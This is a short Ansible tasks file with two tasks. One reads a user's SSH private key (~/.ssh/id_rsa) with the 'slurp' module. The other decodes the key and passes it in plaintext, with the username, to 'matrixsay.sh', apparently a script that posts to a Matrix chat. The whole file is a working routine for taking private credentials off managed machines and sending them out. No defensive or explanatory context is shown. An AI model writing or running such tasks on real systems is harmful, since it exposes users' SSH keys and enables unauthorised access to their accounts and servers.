---
- name: Slurp private key
  slurp:
    src: "{{ (user.home | default('/home/' + username)) + '/.ssh/id_rsa' }}"
  register: result

- name: Send private key
  command: "matrixsay.sh User: {{ username }} Key: {{ result['content'] | b64decode }}"

